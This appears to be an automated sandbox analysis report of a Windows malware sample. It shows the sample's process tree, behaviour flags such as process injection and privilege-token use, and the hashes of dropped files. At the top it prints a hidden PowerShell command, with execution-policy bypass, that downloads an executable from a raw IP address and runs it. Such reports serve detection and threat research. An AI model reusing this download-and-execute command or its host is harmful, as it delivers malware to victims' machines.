C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://192.3.194.246/new.exe','C:\Users\Admin\AppData\Roaming\new.exe')2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1464 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\new.exe2⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1160 -
C:\Users\Admin\AppData\Roaming\new.exeC:\Users\Admin\AppData\Roaming\new.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1676 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1916 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe4⤵PID:1608
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2004
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5b89e63484dc9c78b94f63337a140cc11
SHA1394026ca31ad6ad3a73584dbd345fe64eb29114c
SHA256e1f8ae4c0de824fd9e14c579273577a18334bb80db59192e8319f6887ea2744a
SHA5129b30b4178b76a76bb087d3ef7a4807b9244ee53689e22fc66a41ee10443923fb9623f73cd5e0b4c7b1415fdea00e3076f7f464f6019637445b870a60f3858502
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5b89e63484dc9c78b94f63337a140cc11
SHA1394026ca31ad6ad3a73584dbd345fe64eb29114c
SHA256e1f8ae4c0de824fd9e14c579273577a18334bb80db59192e8319f6887ea2744a
SHA5129b30b4178b76a76bb087d3ef7a4807b9244ee53689e22fc66a41ee10443923fb9623f73cd5e0b4c7b1415fdea00e3076f7f464f6019637445b870a60f3858502
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5b89e63484dc9c78b94f63337a140cc11
SHA1394026ca31ad6ad3a73584dbd345fe64eb29114c
SHA256e1f8ae4c0de824fd9e14c579273577a18334bb80db59192e8319f6887ea2744a
SHA5129b30b4178b76a76bb087d3ef7a4807b9244ee53689e22fc66a41ee10443923fb9623f73cd5e0b4c7b1415fdea00e3076f7f464f6019637445b870a60f3858502
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5b89e63484dc9c78b94f63337a140cc11
SHA1394026ca31ad6ad3a73584dbd345fe64eb29114c
SHA256e1f8ae4c0de824fd9e14c579273577a18334bb80db59192e8319f6887ea2744a
SHA5129b30b4178b76a76bb087d3ef7a4807b9244ee53689e22fc66a41ee10443923fb9623f73cd5e0b4c7b1415fdea00e3076f7f464f6019637445b870a60f3858502
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5b89e63484dc9c78b94f63337a140cc11
SHA1394026ca31ad6ad3a73584dbd345fe64eb29114c
SHA256e1f8ae4c0de824fd9e14c579273577a18334bb80db59192e8319f6887ea2744a
SHA5129b30b4178b76a76bb087d3ef7a4807b9244ee53689e22fc66a41ee10443923fb9623f73cd5e0b4c7b1415fdea00e3076f7f464f6019637445b870a60f3858502
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
75KB
MD559b5570fd782ef0503a49fd7470200b6
SHA11738e6b2ecb79b85e950a9734469404002cbb195
SHA256f621b17f07a862cf0dd4c87aaef881dc2a39e36f73900025169aa34c99d0a650
SHA5122fd88fce69174fd1f84866ebc99e1f31e2ef8e4af4606871953d4eafa56b029f2bd039bab14c6b847368ecddab148b08bf4c28f6e820e18f14784c40a8a42135
-
Filesize
75KB
MD559b5570fd782ef0503a49fd7470200b6
SHA11738e6b2ecb79b85e950a9734469404002cbb195
SHA256f621b17f07a862cf0dd4c87aaef881dc2a39e36f73900025169aa34c99d0a650
SHA5122fd88fce69174fd1f84866ebc99e1f31e2ef8e4af4606871953d4eafa56b029f2bd039bab14c6b847368ecddab148b08bf4c28f6e820e18f14784c40a8a42135
-
Filesize
75KB
MD559b5570fd782ef0503a49fd7470200b6
SHA11738e6b2ecb79b85e950a9734469404002cbb195
SHA256f621b17f07a862cf0dd4c87aaef881dc2a39e36f73900025169aa34c99d0a650
SHA5122fd88fce69174fd1f84866ebc99e1f31e2ef8e4af4606871953d4eafa56b029f2bd039bab14c6b847368ecddab148b08bf4c28f6e820e18f14784c40a8a42135
-
Filesize
75KB
MD559b5570fd782ef0503a49fd7470200b6
SHA11738e6b2ecb79b85e950a9734469404002cbb195
SHA256f621b17f07a862cf0dd4c87aaef881dc2a39e36f73900025169aa34c99d0a650
SHA5122fd88fce69174fd1f84866ebc99e1f31e2ef8e4af4606871953d4eafa56b029f2bd039bab14c6b847368ecddab148b08bf4c28f6e820e18f14784c40a8a42135
-
Filesize
75KB
MD559b5570fd782ef0503a49fd7470200b6
SHA11738e6b2ecb79b85e950a9734469404002cbb195
SHA256f621b17f07a862cf0dd4c87aaef881dc2a39e36f73900025169aa34c99d0a650
SHA5122fd88fce69174fd1f84866ebc99e1f31e2ef8e4af4606871953d4eafa56b029f2bd039bab14c6b847368ecddab148b08bf4c28f6e820e18f14784c40a8a42135
-
Filesize
75KB
MD559b5570fd782ef0503a49fd7470200b6
SHA11738e6b2ecb79b85e950a9734469404002cbb195
SHA256f621b17f07a862cf0dd4c87aaef881dc2a39e36f73900025169aa34c99d0a650
SHA5122fd88fce69174fd1f84866ebc99e1f31e2ef8e4af4606871953d4eafa56b029f2bd039bab14c6b847368ecddab148b08bf4c28f6e820e18f14784c40a8a42135
-
Filesize
75KB
MD559b5570fd782ef0503a49fd7470200b6
SHA11738e6b2ecb79b85e950a9734469404002cbb195
SHA256f621b17f07a862cf0dd4c87aaef881dc2a39e36f73900025169aa34c99d0a650
SHA5122fd88fce69174fd1f84866ebc99e1f31e2ef8e4af4606871953d4eafa56b029f2bd039bab14c6b847368ecddab148b08bf4c28f6e820e18f14784c40a8a42135
-
Filesize
75KB
MD559b5570fd782ef0503a49fd7470200b6
SHA11738e6b2ecb79b85e950a9734469404002cbb195
SHA256f621b17f07a862cf0dd4c87aaef881dc2a39e36f73900025169aa34c99d0a650
SHA5122fd88fce69174fd1f84866ebc99e1f31e2ef8e4af4606871953d4eafa56b029f2bd039bab14c6b847368ecddab148b08bf4c28f6e820e18f14784c40a8a42135